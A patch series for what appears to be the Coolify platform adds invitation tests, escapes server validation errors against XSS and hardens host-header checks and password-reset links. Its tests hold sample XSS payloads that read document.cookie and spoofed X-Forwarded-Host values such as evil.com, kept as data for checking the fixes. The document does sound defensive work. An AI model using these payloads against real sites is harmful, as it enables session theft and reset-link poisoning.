+    expect($this->user->password)->toBe($originalPassword);
+
+    // Invitation should NOT be accepted
+    $this->assertDatabaseHas('team_invitations', [
+        'uuid' => 'test-invitation-uuid',
+    ]);
+});
+
+test('POST invitation accepts and adds user to team', function () {
+    $this->actingAs($this->user);
+
+    $response = $this->post('/invitations/test-invitation-uuid');
+
+    $response->assertRedirect(route('team.index'));
+
+    // Invitation should be deleted
+    $this->assertDatabaseMissing('team_invitations', [
+        'uuid' => 'test-invitation-uuid',
+    ]);
+
+    // User should be added to the team
+    expect($this->user->teams()->where('team_id', $this->team->id)->exists())->toBeTrue();
+});
+
+test('POST invitation without CSRF token is rejected', function () {
+    $this->actingAs($this->user);
+
+    $response = $this->withoutMiddleware(EncryptCookies::class)
+        ->post('/invitations/test-invitation-uuid', [], [
+            'X-CSRF-TOKEN' => 'invalid-token',
+        ]);
+
+    // Should be rejected with 419 (CSRF token mismatch)
+    $response->assertStatus(419);
+
+    // Invitation should NOT be accepted
+    $this->assertDatabaseHas('team_invitations', [
+        'uuid' => 'test-invitation-uuid',
+    ]);
+});
+
+test('unauthenticated user cannot view invitation', function () {
+    $response = $this->get('/invitations/test-invitation-uuid');
+
+    $response->assertRedirect();
+});
+
+test('wrong user cannot view invitation', function () {
+    $otherUser = User::factory()->create(['email' => 'other@example.com']);
+    $this->actingAs($otherUser);
+
+    $response = $this->get('/invitations/test-invitation-uuid');
+
+    $response->assertStatus(400);
+});
+
+test('wrong user cannot accept invitation via POST', function () {
+    $otherUser = User::factory()->create(['email' => 'other@example.com']);
+    $this->actingAs($otherUser);
+
+    $response = $this->post('/invitations/test-invitation-uuid');
+
+    $response->assertStatus(400);
+
+    // Invitation should still exist
+    $this->assertDatabaseHas('team_invitations', [
+        'uuid' => 'test-invitation-uuid',
+    ]);
+});
+
+test('GET revoke route no longer exists', function () {
+    $this->actingAs($this->user);
+
+    $response = $this->get('/invitations/test-invitation-uuid/revoke');
+
+    $response->assertStatus(404);
+});
+
+test('POST invitation for already-member user deletes invitation without duplicating', function () {
+    $this->user->teams()->attach($this->team->id, ['role' => 'member']);
+    $this->actingAs($this->user);
+
+    $response = $this->post('/invitations/test-invitation-uuid');
+
+    $response->assertRedirect(route('team.index'));
+
+    // Invitation should be deleted
+    $this->assertDatabaseMissing('team_invitations', [
+        'uuid' => 'test-invitation-uuid',
+    ]);
+
+    // User should still have exactly one membership in this team
+    expect($this->user->teams()->where('team_id', $this->team->id)->count())->toBe(1);
+});

From 103d5b6c0634644b8e1bc01bf8540480aef65d0a Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 26 Mar 2026 18:36:36 +0100
Subject: [PATCH 152/213] fix: sanitize error output in server validation logs

Escape dynamic error messages with htmlspecialchars() before
concatenating into HTML strings stored in validation_logs. Add a
Purify-based mutator on Server model as defense-in-depth, with a
dedicated HTMLPurifier config that allows only safe structural tags.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Actions/Server/ValidateServer.php      |  3 +-
 app/Jobs/ValidateAndInstallServerJob.php   |  5 +-
 app/Livewire/Server/PrivateKey/Show.php    |  3 +-
 app/Livewire/Server/ValidateAndInstall.php |  3 +-
 app/Models/Server.php                      |  7 ++
 config/purify.php                          | 11 ++++
 tests/Feature/ServerValidationXssTest.php  | 75 ++++++++++++++++++++++
 7 files changed, 102 insertions(+), 5 deletions(-)
 create mode 100644 tests/Feature/ServerValidationXssTest.php

diff --git a/app/Actions/Server/ValidateServer.php b/app/Actions/Server/ValidateServer.php
index 0a20deae5..22c48aa89 100644
--- a/app/Actions/Server/ValidateServer.php
+++ b/app/Actions/Server/ValidateServer.php
@@ -30,7 +30,8 @@ public function handle(Server $server)
         ]);
         ['uptime' => $this->uptime, 'error' => $error] = $server->validateConnection();
         if (! $this->uptime) {
-            $this->error = 'Server is not reachable. Please validate your configuration and connection.<br>Check this <a target="_blank" class="text-black underline dark:text-white" href="https://coolify.io/docs/knowledge-base/server/openssh">documentation</a> for further help. <br><br><div class="text-error">Error: '.$error.'</div>';
+            $sanitizedError = htmlspecialchars($error ?? '', ENT_QUOTES, 'UTF-8');
+            $this->error = 'Server is not reachable. Please validate your configuration and connection.<br>Check this <a target="_blank" class="text-black underline dark:text-white" href="https://coolify.io/docs/knowledge-base/server/openssh">documentation</a> for further help. <br><br><div class="text-error">Error: '.$sanitizedError.'</div>';
             $server->update([
                 'validation_logs' => $this->error,
             ]);
diff --git a/app/Jobs/ValidateAndInstallServerJob.php b/app/Jobs/ValidateAndInstallServerJob.php
index 288904471..ee8cf2797 100644
--- a/app/Jobs/ValidateAndInstallServerJob.php
+++ b/app/Jobs/ValidateAndInstallServerJob.php
@@ -45,7 +45,8 @@ public function handle(): void
             // Validate connection
             ['uptime' => $uptime, 'error' => $error] = $this->server->validateConnection();
             if (! $uptime) {
-                $errorMessage = 'Server is not reachable. Please validate your configuration and connection.<br>Check this <a target="_blank" class="underline" href="https://coolify.io/docs/knowledge-base/server/openssh">documentation</a> for further help. <br><br>Error: '.$error;
+                $sanitizedError = htmlspecialchars($error ?? '', ENT_QUOTES, 'UTF-8');
+                $errorMessage = 'Server is not reachable. Please validate your configuration and connection.<br>Check this <a target="_blank" class="underline" href="https://coolify.io/docs/knowledge-base/server/openssh">documentation</a> for further help. <br><br>Error: '.$sanitizedError;
                 $this->server->update([
                     'validation_logs' => $errorMessage,
                     'is_validating' => false,
@@ -197,7 +198,7 @@ public function handle(): void
             ]);
 
             $this->server->update([
-                'validation_logs' => 'An error occurred during validation: '.$e->getMessage(),
+                'validation_logs' => 'An error occurred during validation: '.htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8'),
                 'is_validating' => false,
             ]);
         }
diff --git a/app/Livewire/Server/PrivateKey/Show.php b/app/Livewire/Server/PrivateKey/Show.php
index fd55717fa..810b95ed4 100644
--- a/app/Livewire/Server/PrivateKey/Show.php
+++ b/app/Livewire/Server/PrivateKey/Show.php
@@ -63,7 +63,8 @@ public function checkConnection()
                 $this->dispatch('success', 'Server is reachable.');
                 $this->dispatch('refreshServerShow');
             } else {
-                $this->dispatch('error', 'Server is not reachable.<br><br>Check this <a target="_blank" class="underline" href="https://coolify.io/docs/knowledge-base/server/openssh">documentation</a> for further help.<br><br>Error: '.$error);
+                $sanitizedError = htmlspecialchars($error ?? '', ENT_QUOTES, 'UTF-8');
+                $this->dispatch('error', 'Server is not reachable.<br><br>Check this <a target="_blank" class="underline" href="https://coolify.io/docs/knowledge-base/server/openssh">documentation</a> for further help.<br><br>Error: '.$sanitizedError);
 
                 return;
             }
diff --git a/app/Livewire/Server/ValidateAndInstall.php b/app/Livewire/Server/ValidateAndInstall.php
index 198d823b9..59ca4cd36 100644
--- a/app/Livewire/Server/ValidateAndInstall.php
+++ b/app/Livewire/Server/ValidateAndInstall.php
@@ -89,7 +89,8 @@ public function validateConnection()
         $this->authorize('update', $this->server);
         ['uptime' => $this->uptime, 'error' => $error] = $this->server->validateConnection();
         if (! $this->uptime) {
-            $this->error = 'Server is not reachable. Please validate your configuration and connection.<br>Check this <a target="_blank" class="text-black underline dark:text-white" href="https://coolify.io/docs/knowledge-base/server/openssh">documentation</a> for further help. <br><br><div class="text-error">Error: '.$error.'</div>';
+            $sanitizedError = htmlspecialchars($error ?? '', ENT_QUOTES, 'UTF-8');
+            $this->error = 'Server is not reachable. Please validate your configuration and connection.<br>Check this <a target="_blank" class="text-black underline dark:text-white" href="https://coolify.io/docs/knowledge-base/server/openssh">documentation</a> for further help. <br><br><div class="text-error">Error: '.$sanitizedError.'</div>';
             $this->server->update([
                 'validation_logs' => $this->error,
             ]);
diff --git a/app/Models/Server.php b/app/Models/Server.php
index 9237763c8..00843b3da 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -269,6 +269,13 @@ public static function flushIdentityMap(): void
 
     use HasSafeStringAttribute;
 
+    public function setValidationLogsAttribute($value): void
+    {
+        $this->attributes['validation_logs'] = $value !== null
+            ? \Stevebauman\Purify\Facades\Purify::config('validation_logs')->clean($value)
+            : null;
+    }
+
     public function type()
     {
         return 'server';
diff --git a/config/purify.php b/config/purify.php
index 66dbbb568..a5dcabb92 100644
--- a/config/purify.php
+++ b/config/purify.php
@@ -49,6 +49,17 @@
             'AutoFormat.RemoveEmpty' => false,
         ],
 
+        'validation_logs' => [
+            'Core.Encoding' => 'utf-8',
+            'HTML.Doctype' => 'HTML 4.01 Transitional',
+            'HTML.Allowed' => 'a[href|title|target|class],br,div[class],pre[class],span[class],p[class]',
+            'HTML.ForbiddenElements' => '',
+            'CSS.AllowedProperties' => '',
+            'AutoFormat.AutoParagraph' => false,
+            'AutoFormat.RemoveEmpty' => false,
+            'Attr.AllowedFrameTargets' => ['_blank'],
+        ],
+
     ],
 
     /*
diff --git a/tests/Feature/ServerValidationXssTest.php b/tests/Feature/ServerValidationXssTest.php
new file mode 100644
index 000000000..ba8e6fcae
--- /dev/null
+++ b/tests/Feature/ServerValidationXssTest.php
@@ -0,0 +1,75 @@
+<?php
+
+use App\Models\Server;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $user = User::factory()->create();
+    $this->team = Team::factory()->create();
+    $user->teams()->attach($this->team);
+    $this->actingAs($user);
+    session(['currentTeam' => $this->team]);
+
+    $this->server = Server::factory()->create([
+        'team_id' => $this->team->id,
+    ]);
+});
+
+it('strips dangerous HTML from validation_logs via mutator', function () {
+    $xssPayload = '<img src=x onerror=alert(document.domain)>';
+    $this->server->update(['validation_logs' => $xssPayload]);
+    $this->server->refresh();
+
+    expect($this->server->validation_logs)->not->toContain('<img')
+        ->and($this->server->validation_logs)->not->toContain('onerror');
+});
+
+it('strips script tags from validation_logs', function () {
+    $xssPayload = '<script>alert("xss")</script>';
+    $this->server->update(['validation_logs' => $xssPayload]);
+    $this->server->refresh();
+
+    expect($this->server->validation_logs)->not->toContain('<script');
+});
+
+it('preserves allowed HTML in validation_logs', function () {
+    $allowedHtml = 'Server is not reachable.<br>Check this <a target="_blank" class="underline" href="https://coolify.io/docs">documentation</a> for further help.<br><br><div class="text-error">Error: Connection refused</div>';
+    $this->server->update(['validation_logs' => $allowedHtml]);
+    $this->server->refresh();
+
+    expect($this->server->validation_logs)->toContain('<a')
+        ->and($this->server->validation_logs)->toContain('<br')
+        ->and($this->server->validation_logs)->toContain('<div')
+        ->and($this->server->validation_logs)->toContain('Connection refused');
+});
+
+it('allows null validation_logs', function () {
+    $this->server->update(['validation_logs' => null]);
+    $this->server->refresh();
+
+    expect($this->server->validation_logs)->toBeNull();
+});
+
+it('sanitizes XSS embedded within valid error HTML', function () {
+    $maliciousError = 'Server is not reachable.<br><div class="text-error">Error: <img src=x onerror=alert(document.cookie)></div>';
+    $this->server->update(['validation_logs' => $maliciousError]);
+    $this->server->refresh();
+
+    expect($this->server->validation_logs)->toContain('<div')
+        ->and($this->server->validation_logs)->toContain('Error:')
+        ->and($this->server->validation_logs)->not->toContain('onerror')
+        ->and($this->server->validation_logs)->not->toContain('<img');
+});
+
+it('sanitizes event handler attributes in validation_logs', function () {
+    $payload = '<div onmouseover="alert(1)" class="text-error">Error</div>';
+    $this->server->update(['validation_logs' => $payload]);
+    $this->server->refresh();
+
+    expect($this->server->validation_logs)->toContain('<div')
+        ->and($this->server->validation_logs)->not->toContain('onmouseover');
+});

From e1d4b4682efc898ba5aa3751b2da2072f89c7e24 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 26 Mar 2026 14:43:40 +0100
Subject: [PATCH 153/213] fix: harden TrustHosts middleware and use base_url()
 for password reset links
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

- Fix circular cache dependency in TrustHosts where handle() checked cache
  before hosts() could populate it, causing host validation to never activate
- Validate both Host and X-Forwarded-Host headers against trusted hosts list
  (X-Forwarded-Host is checked before TrustProxies applies it to the request)
- Use base_url() instead of url() for password reset link generation so the
  URL is derived from server-side config (FQDN / public IP) instead of the
  request context
- Strip port from X-Forwarded-Host before matching (e.g. host:443 → host)
- Add tests for host validation, cache population, and reset URL generation

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Http/Middleware/TrustHosts.php            |  59 ++++++-
 .../TransactionalEmails/ResetPassword.php     |   7 +-
 tests/Feature/ResetPasswordUrlTest.php        | 123 +++++++++++++++
 tests/Feature/TrustHostsMiddlewareTest.php    | 145 ++++++++++++++++--
 4 files changed, 321 insertions(+), 13 deletions(-)
 create mode 100644 tests/Feature/ResetPasswordUrlTest.php

diff --git a/app/Http/Middleware/TrustHosts.php b/app/Http/Middleware/TrustHosts.php
index 5fca583d9..d44b6057a 100644
--- a/app/Http/Middleware/TrustHosts.php
+++ b/app/Http/Middleware/TrustHosts.php
@@ -30,14 +30,44 @@ public function handle(Request $request, $next)
             return $next($request);
         }
 
+        // Eagerly call hosts() to populate the cache (fixes circular dependency
+        // where handle() checked cache before hosts() could populate it via
+        // Cache::remember, causing host validation to never activate)
+        $this->hosts();
+
         // Skip host validation if no FQDN is configured (initial setup)
         $fqdnHost = Cache::get('instance_settings_fqdn_host');
         if ($fqdnHost === '' || $fqdnHost === null) {
             return $next($request);
         }
 
-        // For all other routes, use parent's host validation
-        return parent::handle($request, $next);
+        // Validate the request host against trusted hosts explicitly.
+        // We check manually instead of relying on Symfony's lazy getHost() validation,
+        // which can be bypassed if getHost() was already called earlier in the pipeline.
+        $trustedHosts = array_filter($this->hosts());
+
+        // Collect all hosts to validate: the actual Host header, plus X-Forwarded-Host
+        // if present. We must check X-Forwarded-Host here because this middleware runs
+        // BEFORE TrustProxies, which would later apply X-Forwarded-Host to the request.
+        $hostsToValidate = [strtolower(trim($request->getHost()))];
+
+        $forwardedHost = $request->headers->get('X-Forwarded-Host');
+        if ($forwardedHost) {
+            // X-Forwarded-Host can be a comma-separated list; validate the first (client-facing) value.
+            // Strip port if present (e.g. "coolify.example.com:443" → "coolify.example.com")
+            // to match the trusted hosts list which stores hostnames without ports.
+            $forwardedHostValue = strtolower(trim(explode(',', $forwardedHost)[0]));
+            $forwardedHostValue = preg_replace('/:\d+$/', '', $forwardedHostValue);
+            $hostsToValidate[] = $forwardedHostValue;
+        }
+
+        foreach ($hostsToValidate as $hostToCheck) {
+            if (! $this->isHostTrusted($hostToCheck, $trustedHosts)) {
+                return response('Bad Host', 400);
+            }
+        }
+
+        return $next($request);
     }
 
     /**
@@ -100,4 +130,29 @@ public function hosts(): array
 
         return array_filter($trustedHosts);
     }
+
+    /**
+     * Check if a host matches the trusted hosts list.
+     *
+     * Regex patterns (from allSubdomainsOfApplicationUrl, starting with ^)
+     * are matched with preg_match. Literal hostnames use exact comparison
+     * only — they are NOT passed to preg_match, which would treat unescaped
+     * dots as wildcards and match unanchored substrings.
+     *
+     * @param  array<int, string>  $trustedHosts
+     */
+    protected function isHostTrusted(string $host, array $trustedHosts): bool
+    {
+        foreach ($trustedHosts as $pattern) {
+            if (str_starts_with($pattern, '^')) {
+                if (@preg_match('{'.$pattern.'}i', $host)) {
+                    return true;
+                }
+            } elseif ($host === $pattern) {
+                return true;
+            }
+        }
+
+        return false;
+    }
 }
diff --git a/app/Notifications/TransactionalEmails/ResetPassword.php b/app/Notifications/TransactionalEmails/ResetPassword.php
index 179c8d948..511818e21 100644
--- a/app/Notifications/TransactionalEmails/ResetPassword.php
+++ b/app/Notifications/TransactionalEmails/ResetPassword.php
@@ -67,9 +67,12 @@ protected function resetUrl($notifiable)
             return call_user_func(static::$createUrlCallback, $notifiable, $this->token);
         }
 
-        return url(route('password.reset', [
+        $path = route('password.reset', [
             'token' => $this->token,
             'email' => $notifiable->getEmailForPasswordReset(),
-        ], false));
+        ], false);
+
+        // Use server-side config (FQDN / public IP) instead of request host
+        return rtrim(base_url(), '/').$path;
     }
 }
diff --git a/tests/Feature/ResetPasswordUrlTest.php b/tests/Feature/ResetPasswordUrlTest.php
new file mode 100644
index 000000000..03d1103f0
--- /dev/null
+++ b/tests/Feature/ResetPasswordUrlTest.php
@@ -0,0 +1,123 @@
+<?php
+
+use App\Models\InstanceSettings;
+use App\Models\User;
+use App\Notifications\TransactionalEmails\ResetPassword;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Facades\Cache;
+use Illuminate\Support\Once;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    Cache::forget('instance_settings_fqdn_host');
+    Once::flush();
+});
+
+function callResetUrl(ResetPassword $notification, $notifiable): string
+{
+    $method = new ReflectionMethod($notification, 'resetUrl');
+
+    return $method->invoke($notification, $notifiable);
+}
+
+it('generates reset URL using configured FQDN, not request host', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => 'https://coolify.example.com', 'public_ipv4' => '65.21.3.91']
+    );
+    Once::flush();
+
+    $user = User::factory()->create();
+    $notification = new ResetPassword('test-token-abc', isTransactionalEmail: false);
+
+    $url = callResetUrl($notification, $user);
+
+    expect($url)
+        ->toStartWith('https://coolify.example.com/')
+        ->toContain('test-token-abc')
+        ->toContain(urlencode($user->email))
+        ->not->toContain('localhost');
+});
+
+it('generates reset URL using public IP when no FQDN is configured', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => null, 'public_ipv4' => '65.21.3.91']
+    );
+    Once::flush();
+
+    $user = User::factory()->create();
+    $notification = new ResetPassword('test-token-abc', isTransactionalEmail: false);
+
+    $url = callResetUrl($notification, $user);
+
+    expect($url)
+        ->toContain('65.21.3.91')
+        ->toContain('test-token-abc')
+        ->not->toContain('evil.com');
+});
+
+it('is immune to X-Forwarded-Host header poisoning when FQDN is set', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => 'https://coolify.example.com', 'public_ipv4' => '65.21.3.91']
+    );
+    Once::flush();
+
+    // Simulate a request with a spoofed X-Forwarded-Host header
+    $user = User::factory()->create();
+
+    $this->withHeaders([
+        'X-Forwarded-Host' => 'evil.com',
+    ])->get('/');
+
+    $notification = new ResetPassword('poisoned-token', isTransactionalEmail: false);
+    $url = callResetUrl($notification, $user);
+
+    expect($url)
+        ->toStartWith('https://coolify.example.com/')
+        ->toContain('poisoned-token')
+        ->not->toContain('evil.com');
+});
+
+it('is immune to X-Forwarded-Host header poisoning when using IP only', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => null, 'public_ipv4' => '65.21.3.91']
+    );
+    Once::flush();
+
+    $user = User::factory()->create();
+
+    $this->withHeaders([
+        'X-Forwarded-Host' => 'evil.com',
+    ])->get('/');
+
+    $notification = new ResetPassword('poisoned-token', isTransactionalEmail: false);
+    $url = callResetUrl($notification, $user);
+
+    expect($url)
+        ->toContain('65.21.3.91')
+        ->toContain('poisoned-token')
+        ->not->toContain('evil.com');
+});
+
+it('generates a valid route path in the reset URL', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => 'https://coolify.example.com']
+    );
+    Once::flush();
+
+    $user = User::factory()->create();
+    $notification = new ResetPassword('my-token', isTransactionalEmail: false);
+
+    $url = callResetUrl($notification, $user);
+
+    // Should contain the password reset route path with token and email
+    expect($url)
+        ->toContain('/reset-password/')
+        ->toContain('my-token')
+        ->toContain(urlencode($user->email));
+});
diff --git a/tests/Feature/TrustHostsMiddlewareTest.php b/tests/Feature/TrustHostsMiddlewareTest.php
index 5c60b30d6..a16698a6a 100644
--- a/tests/Feature/TrustHostsMiddlewareTest.php
+++ b/tests/Feature/TrustHostsMiddlewareTest.php
@@ -2,13 +2,16 @@
 
 use App\Http\Middleware\TrustHosts;
 use App\Models\InstanceSettings;
+use Illuminate\Foundation\Testing\RefreshDatabase;
 use Illuminate\Support\Facades\Cache;
+use Illuminate\Support\Once;
 
-uses(\Illuminate\Foundation\Testing\RefreshDatabase::class);
+uses(RefreshDatabase::class);
 
 beforeEach(function () {
-    // Clear cache before each test to ensure isolation
+    // Clear cache and once() memoization to ensure isolation between tests
     Cache::forget('instance_settings_fqdn_host');
+    Once::flush();
 });
 
 it('trusts the configured FQDN from InstanceSettings', function () {
@@ -84,7 +87,7 @@
 
 it('handles exception during InstanceSettings fetch', function () {
     // Drop the instance_settings table to simulate installation
-    \Schema::dropIfExists('instance_settings');
+    Schema::dropIfExists('instance_settings');
 
     $middleware = new TrustHosts($this->app);
 
@@ -248,21 +251,144 @@
     expect($response->status())->not->toBe(400);
 });
 
+it('populates cache on first request via handle() — no circular dependency', function () {
+    // Regression test: handle() used to check cache before hosts() could
+    // populate it, so host validation never activated.
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => 'https://coolify.example.com']
+    );
+
+    // Clear cache to simulate cold start
+    Cache::forget('instance_settings_fqdn_host');
+
+    // Make a request — handle() should eagerly call hosts() to populate cache
+    $this->get('/', ['Host' => 'localhost']);
+
+    // Cache should now be populated by the middleware
+    expect(Cache::get('instance_settings_fqdn_host'))->toBe('coolify.example.com');
+});
+
+it('rejects host that is a superstring of trusted FQDN via suffix', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => 'https://coolify.example.com']
+    );
+
+    // coolify.example.com.evil.com contains "coolify.example.com" as a substring —
+    // must NOT match. Literal hosts use exact comparison, not regex substring matching.
+    $response = $this->get('http://coolify.example.com.evil.com/');
+
+    expect($response->status())->toBe(400);
+});
+
+it('rejects host that is a superstring of trusted FQDN via prefix', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => 'https://coolify.example.com']
+    );
+
+    // evil-coolify.example.com also contains the FQDN as a substring
+    $response = $this->get('http://evil-coolify.example.com/');
+
+    expect($response->status())->toBe(400);
+});
+
+it('rejects X-Forwarded-Host that is a superstring of trusted FQDN', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => 'https://coolify.example.com']
+    );
+
+    $response = $this->get('/', [
+        'X-Forwarded-Host' => 'coolify.example.com.evil.com',
+    ]);
+
+    expect($response->status())->toBe(400);
+});
+
+it('rejects host containing localhost as substring', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => 'https://coolify.example.com']
+    );
+
+    // "evil-localhost" contains "localhost" — must not match the literal entry
+    $response = $this->get('http://evil-localhost/');
+
+    expect($response->status())->toBe(400);
+});
+
+it('allows subdomain of APP_URL via regex pattern', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => 'https://coolify.example.com']
+    );
+
+    // sub.localhost should match ^(.+\.)?localhost$ from allSubdomainsOfApplicationUrl
+    $response = $this->get('http://sub.localhost/');
+
+    expect($response->status())->not->toBe(400);
+});
+
 it('still enforces host validation for non-terminal routes', function () {
     InstanceSettings::updateOrCreate(
         ['id' => 0],
         ['fqdn' => 'https://coolify.example.com']
     );
 
-    // Regular routes should still validate Host header
-    $response = $this->get('/', [
-        'Host' => 'evil.com',
-    ]);
+    // Use full URL so Laravel's test client doesn't override Host with APP_URL
+    $response = $this->get('http://evil.com/');
 
     // Should get 400 Bad Host for untrusted host
     expect($response->status())->toBe(400);
 });
 
+it('rejects requests with spoofed X-Forwarded-Host header', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => 'https://coolify.example.com']
+    );
+
+    // Host header is trusted (localhost), but X-Forwarded-Host is spoofed.
+    // TrustHosts must reject this BEFORE TrustProxies can apply the spoofed host.
+    $response = $this->get('/', [
+        'X-Forwarded-Host' => 'evil.com',
+    ]);
+
+    expect($response->status())->toBe(400);
+});
+
+it('allows legitimate X-Forwarded-Host from reverse proxy matching configured FQDN', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => 'https://coolify.example.com']
+    );
+
+    // Legitimate request from Cloudflare/Traefik — X-Forwarded-Host matches the configured FQDN
+    $response = $this->get('/', [
+        'X-Forwarded-Host' => 'coolify.example.com',
+    ]);
+
+    // Should NOT be rejected (would be 400 for Bad Host)
+    expect($response->status())->not->toBe(400);
+});
+
+it('allows X-Forwarded-Host with port matching configured FQDN', function () {
+    InstanceSettings::updateOrCreate(
+        ['id' => 0],
+        ['fqdn' => 'https://coolify.example.com']
+    );
+
+    // Some proxies include the port in X-Forwarded-Host
+    $response = $this->get('/', [
+        'X-Forwarded-Host' => 'coolify.example.com:443',
+    ]);
+
+    // Should NOT be rejected — port is stripped before matching
+    expect($response->status())->not->toBe(400);
+});
+
 it('skips host validation for API routes', function () {
     // All API routes use token-based auth (Sanctum), not host validation
     // They should be accessible from any host (mobile apps, CLI tools, scripts)
@@ -352,9 +478,10 @@
     ]);
     expect($response->status())->not->toBe(400);
 
-    // Test Stripe webhook
+    // Test Stripe webhook — may return 400 from Stripe signature validation,
+    // but the response should NOT contain "Bad Host" (host validation error)
     $response = $this->post('/webhooks/payments/stripe/events', [], [
         'Host' => 'stripe-webhook-forwarder.local',
     ]);
-    expect($response->status())->not->toBe(400);
+    expect($response->content())->not->toContain('Bad Host');
 });

From 9b0088072cd29e39632b2546918db776fc8b371c Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 27 Mar 2026 14:12:30 +0100
Subject: [PATCH 154/213] refactor(docker): migrate service startup from
 Artisan commands to shell scripts

Remove custom Artisan console commands (Horizon, Nightwatch, Scheduler) and
refactor service startup logic directly into s6-overlay shell scripts. Check
environment variables from .env instead of routing through Laravel config.

Services now sleep when disabled instead of exiting immediately. Both
development and production environments updated consistently.
---
 app/Console/Commands/Horizon.php              | 23 -------------------
 app/Console/Commands/Nightwatch.php           | 22 ------------------
 app/Console/Commands/Scheduler.php            | 23 -------------------
 .../etc/s6-overlay/s6-rc.d/horizon/run        | 15 ++++++------
 .../s6-overlay/s6-rc.d/nightwatch-agent/run   | 15 ++++++------
 .../s6-overlay/s6-rc.d/scheduler-worker/run   | 16 ++++++-------
 .../etc/s6-overlay/s6-rc.d/horizon/run        | 16 ++++++-------
 .../s6-overlay/s6-rc.d/nightwatch-agent/run   | 16 ++++++-------
 .../s6-overlay/s6-rc.d/scheduler-worker/run   | 17 +++++++-------
 9 files changed, 46 insertions(+), 117 deletions(-)
 delete mode 100644 app/Console/Commands/Horizon.php
 delete mode 100644 app/Console/Commands/Nightwatch.php
 delete mode 100644 app/Console/Commands/Scheduler.php

diff --git a/app/Console/Commands/Horizon.php b/app/Console/Commands/Horizon.php
deleted file mode 100644
index d3e35ca5a..000000000
--- a/app/Console/Commands/Horizon.php
+++ /dev/null
@@ -1,23 +0,0 @@
-<?php
-
-namespace App\Console\Commands;
-
-use Illuminate\Console\Command;
-
-class Horizon extends Command
-{
-    protected $signature = 'start:horizon';
-
-    protected $description = 'Start Horizon';
-
-    public function handle()
-    {
-        if (config('constants.horizon.is_horizon_enabled')) {
-            $this->info('Horizon is enabled on this server.');
-            $this->call('horizon');
-            exit(0);
-        } else {
-            exit(0);
-        }
-    }
-}
diff --git a/app/Console/Commands/Nightwatch.php b/app/Console/Commands/Nightwatch.php
deleted file mode 100644
index 40fd86a81..000000000
--- a/app/Console/Commands/Nightwatch.php
+++ /dev/null
@@ -1,22 +0,0 @@
-<?php
-
-namespace App\Console\Commands;
-
-use Illuminate\Console\Command;
-
-class Nightwatch extends Command
-{
-    protected $signature = 'start:nightwatch';
-
-    protected $description = 'Start Nightwatch';
-
-    public function handle(): void
-    {
-        if (config('constants.nightwatch.is_nightwatch_enabled')) {
-            $this->info('Nightwatch is enabled on this server.');
-            $this->call('nightwatch:agent');
-        }
-
-        exit(0);
-    }
-}
diff --git a/app/Console/Commands/Scheduler.php b/app/Console/Commands/Scheduler.php
deleted file mode 100644
index ee64368c3..000000000
--- a/app/Console/Commands/Scheduler.php
+++ /dev/null
@@ -1,23 +0,0 @@
-<?php
-
-namespace App\Console\Commands;
-
-use Illuminate\Console\Command;
-
-class Scheduler extends Command
-{
-    protected $signature = 'start:scheduler';
-
-    protected $description = 'Start Scheduler';
-
-    public function handle()
-    {
-        if (config('constants.horizon.is_scheduler_enabled')) {
-            $this->info('Scheduler is enabled on this server.');
-            $this->call('schedule:work');
-            exit(0);
-        } else {
-            exit(0);
-        }
-    }
-}
diff --git a/docker/development/etc/s6-overlay/s6-rc.d/horizon/run b/docker/development/etc/s6-overlay/s6-rc.d/horizon/run
index ada19b3a3..e6a17f858 100644
--- a/docker/development/etc/s6-overlay/s6-rc.d/horizon/run
+++ b/docker/development/etc/s6-overlay/s6-rc.d/horizon/run
@@ -1,12 +1,11 @@
-#!/command/execlineb -P
+#!/bin/sh
 
-# Use with-contenv to ensure environment variables are available
-with-contenv
 cd /var/www/html
 
-foreground {
-    php
-    artisan
-    start:horizon
-}
+if grep -qE '^HORIZON_ENABLED=false' .env 2>/dev/null; then
+    echo "horizon: disabled, sleeping."
+    exec sleep infinity
+fi
 
+echo "horizon: enabled, starting..."
+exec php artisan horizon
diff --git a/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/run b/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
index 1166ccd08..80b421c92 100644
--- a/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
+++ b/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
@@ -1,12 +1,11 @@
-#!/command/execlineb -P
+#!/bin/sh
 
-# Use with-contenv to ensure environment variables are available
-with-contenv
 cd /var/www/html
 
-foreground {
-    php
-    artisan
-    start:nightwatch
-}
